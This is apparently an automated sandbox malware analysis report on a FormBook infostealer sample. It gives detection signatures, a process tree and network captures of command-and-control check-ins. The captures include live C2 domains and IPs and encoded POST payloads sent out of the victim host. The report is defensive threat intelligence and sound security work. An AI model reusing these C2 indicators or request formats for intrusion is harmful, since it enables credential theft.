Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hgq5nzWJll.exe

Overview

General Information

Sample name:hgq5nzWJll.exe
renamed because original name is a hash value
Original sample name:2b237db9c22328f7ca27581fb777ba32c7352c81c61880c0f0d226e6663556dc.exe
Analysis ID:1588298
MD5:649587a22d4d6da8d4f7aa2c2d4a195e
SHA1:7830a95bf645b1bce599e4c3ffb7ca2c74756d0a
SHA256:2b237db9c22328f7ca27581fb777ba32c7352c81c61880c0f0d226e6663556dc
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • hgq5nzWJll.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\hgq5nzWJll.exe" MD5: 649587A22D4D6DA8D4F7AA2C2D4A195E)
    • hgq5nzWJll.exe (PID: 7592 cmdline: "C:\Users\user\Desktop\hgq5nzWJll.exe" MD5: 649587A22D4D6DA8D4F7AA2C2D4A195E)
      • jCNfinsYqEsIM.exe (PID: 7096 cmdline: "C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cacls.exe (PID: 8056 cmdline: "C:\Windows\SysWOW64\cacls.exe" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
          • jCNfinsYqEsIM.exe (PID: 6364 cmdline: "C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2621191548.0000000003270000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.2620141085.00000000015D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.1967405892.0000000001B90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.2620684145.0000000002F80000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.2621124950.0000000003220000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.hgq5nzWJll.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.hgq5nzWJll.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T23:41:40.204392+010028554651A Network Trojan was detected192.168.2.1161137172.96.191.3980TCP
                2025-01-10T23:42:03.718484+010028554651A Network Trojan was detected192.168.2.1161141217.160.0.18380TCP
                2025-01-10T23:42:16.904651+010028554651A Network Trojan was detected192.168.2.116114584.32.84.3280TCP
                2025-01-10T23:42:30.308315+010028554651A Network Trojan was detected192.168.2.1161149209.74.79.4280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T23:41:55.972794+010028554641A Network Trojan was detected192.168.2.1161138217.160.0.18380TCP
                2025-01-10T23:41:58.527321+010028554641A Network Trojan was detected192.168.2.1161139217.160.0.18380TCP
                2025-01-10T23:42:01.070117+010028554641A Network Trojan was detected192.168.2.1161140217.160.0.18380TCP
                2025-01-10T23:42:09.264886+010028554641A Network Trojan was detected192.168.2.116114284.32.84.3280TCP
                2025-01-10T23:42:11.813056+010028554641A Network Trojan was detected192.168.2.116114384.32.84.3280TCP
                2025-01-10T23:42:14.354373+010028554641A Network Trojan was detected192.168.2.116114484.32.84.3280TCP
                2025-01-10T23:42:22.695709+010028554641A Network Trojan was detected192.168.2.1161146209.74.79.4280TCP
                2025-01-10T23:42:25.226145+010028554641A Network Trojan was detected192.168.2.1161147209.74.79.4280TCP
                2025-01-10T23:42:27.739930+010028554641A Network Trojan was detected192.168.2.1161148209.74.79.4280TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: hgq5nzWJll.exeVirustotal: Detection: 76%Perma Link
                Source: hgq5nzWJll.exeReversingLabs: Detection: 82%
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.hgq5nzWJll.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.hgq5nzWJll.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2621191548.0000000003270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2620141085.00000000015D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1967405892.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2620684145.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2621124950.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1965649962.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1967699628.0000000001D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: hgq5nzWJll.exeJoe Sandbox ML: detected
                Source: hgq5nzWJll.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: hgq5nzWJll.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: hgq5nzWJll.exe, 00000003.00000002.1965992252.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, jCNfinsYqEsIM.exe, 00000007.00000002.2619583932.0000000001497000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: hgq5nzWJll.exe, 00000003.00000002.1965992252.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, jCNfinsYqEsIM.exe, 00000007.00000002.2619583932.0000000001497000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jCNfinsYqEsIM.exe, 00000007.00000000.1891566384.000000000095E000.00000002.00000001.01000000.0000000C.sdmp, jCNfinsYqEsIM.exe, 00000009.00000002.2618668154.000000000095E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: hgq5nzWJll.exe, 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000008.00000003.1968407486.0000000003220000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000008.00000003.1965912160.0000000003023000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: hgq5nzWJll.exe, hgq5nzWJll.exe, 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000008.00000003.1968407486.0000000003220000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000008.00000003.1965912160.0000000003023000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C6C3D0 FindFirstFileW,FindNextFileW,FindClose,8_2_02C6C3D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then xor eax, eax8_2_02C59DA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then pop edi8_2_02C5E104
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then mov ebx, 00000004h8_2_037204BF

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:61144 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:61149 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:61143 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:61146 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:61141 -> 217.160.0.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:61148 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:61145 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:61147 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:61138 -> 217.160.0.183:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:61137 -> 172.96.191.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:61139 -> 217.160.0.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:61142 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:61140 -> 217.160.0.183:80
                Source: global trafficTCP traffic: 192.168.2.11:61056 -> 162.159.36.2:53
                Source: Joe Sandbox ViewIP Address: 209.74.79.42 209.74.79.42
                Source: Joe Sandbox ViewIP Address: 172.96.191.39 172.96.191.39
                Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
                Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /oz0e/?GF=mlOXG&IJQ=N0iBPOr2h1wf3hrnovRBb1Y/GOEfnc+lKlX+67l0LxDwIz/NET6JyzkCPnJBSBJZztg4pX1Iwr0Nd76JZuhGaj9BaNcemEVJE4if1Cf0Ux8WzxQbGzZtN58= HTTP/1.1Host: www.88rtp.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /o5mm/?IJQ=52ZaOoJJHsYFYpcHg+Nk6TaLHqcYp0Vxq28CYNd7tHRxqCukViCUoH1jhmN2/g+W5SkTzZJsaEIA3pVY9O1vDo3OOfdhA/KFz3DOpUouoe/3RRH1ei5BFqs=&GF=mlOXG HTTP/1.1Host: www.kubex.devAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /073p/?GF=mlOXG&IJQ=NsdLHLYUe9sblrm3UOGRvC4p7TYTQZr/4RSieCn+7DwPKByw7jhxCyN0LTJMQHRDPlmDRdKjKllFY9ccUXh84wh4P+Mkk2rH6R5Xw9P/6Vdw6OeNADfEYyY= HTTP/1.1Host: www.sido247.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /dheh/?IJQ=6JcMAOZ0kkEuPLPrHoW/FblxSw+tVU6K5Nqk+SkmZf4Wc9f19ayTyDmVFSf9h78jkWY5XnirO34u2f/fghaoXyr8Ye4/fwyHnaYezOVMQq/814mWJNreSyQ=&GF=mlOXG HTTP/1.1Host: www.glowups.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
                Source: global trafficDNS traffic detected: DNS query: www.88rtp.biz
                Source: global trafficDNS traffic detected: DNS query: www.kubex.dev
                Source: global trafficDNS traffic detected: DNS query: www.sido247.pro
                Source: global trafficDNS traffic detected: DNS query: www.glowups.life
                Source: unknownHTTP traffic detected: POST /o5mm/ HTTP/1.1Host: www.kubex.devAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.5Origin: http://www.kubex.devReferer: http://www.kubex.dev/o5mm/Content-Length: 200Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0Data Raw: 49 4a 51 3d 30 30 78 36 4e 63 31 4f 48 63 67 48 52 39 45 73 36 49 49 47 6e 30 6e 72 57 5a 4a 74 70 33 42 62 37 58 6b 69 62 64 39 5a 68 79 64 47 6b 79 66 71 51 69 53 6b 73 67 4e 4f 69 41 6b 77 31 58 53 54 2f 42 41 49 34 49 42 67 4e 31 49 58 34 70 52 51 34 38 74 6a 46 62 6a 30 57 4d 6c 2f 59 64 2b 6e 30 48 72 32 77 6b 45 34 70 35 48 2f 47 45 50 67 4d 69 6b 74 62 4c 63 56 46 54 4b 6e 4b 6b 6b 74 61 76 72 65 64 71 4a 74 43 44 39 47 6d 59 4d 7a 57 73 74 65 5a 36 47 39 67 37 2b 47 2f 4e 6d 74 33 51 6a 68 4e 54 2f 43 64 48 46 73 42 46 2f 51 61 32 72 58 4b 71 78 37 42 4d 44 50 6b 53 6d 4f 45 67 3d 3d Data Ascii: IJQ=00x6Nc1OHcgHR9Es6IIGn0nrWZJtp3Bb7Xkibd9ZhydGkyfqQiSksgNOiAkw1XST/BAI4IBgN1IX4pRQ48tjFbj0WMl/Yd+n0Hr2wkE4p5H/GEPgMiktbLcVFTKnKkktavredqJtCD9GmYMzWsteZ6G9g7+G/Nmt3QjhNT/CdHFsBF/Qa2rXKqx7BMDPkSmOEg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 22:41:40 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 10 Jan 2025 22:41:55 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 10 Jan 2025 22:41:58 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 10 Jan 2025 22:42:00 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 